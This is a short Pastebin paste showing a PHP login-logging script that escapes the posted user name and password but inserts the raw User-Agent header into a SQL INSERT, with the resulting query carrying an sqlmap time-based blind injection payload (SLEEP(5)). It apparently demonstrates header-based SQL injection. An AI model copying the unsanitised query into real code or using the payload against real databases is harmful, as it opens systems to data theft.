Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- $UA = $_SERVER['HTTP_USER_AGENT']
- $DB_USER = "user";
- $DB_PASS = "p@ss";
- $DB_NAME = "vuln_db";
- $DB_HOST = "localhost";
- $conn = mysqli_connect($DB_HOST,$DB_USER,$DB_PASS,$DB_NAME);
- $USER = mysqli_real_escape_string($conn,$_POST['user']);
- $PSWD = mysqli_real_escape_string($conn,$_POST['pass']);
- $sqlstatement = "INSERT INTO logs (lid,user,pass,useragent) VALUES(NULL,'" . $USER . "','" . $PSWD . "','" . $UA . "')";
- ?>
- INSERT INTO logs (lid,user,pass,useragent) VALUES(NULL,'FakeUser','FakePass','sqlmap/1.2.6#stable (http://sqlmap.org)' AND (SELECT * FROM (SLEEP(5)))vsaW) AND 'RVpx'='RVpx')
- mysql Ver 15.1 Distrib 10.1.26-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2
Add Comment
Please, Sign In to add comment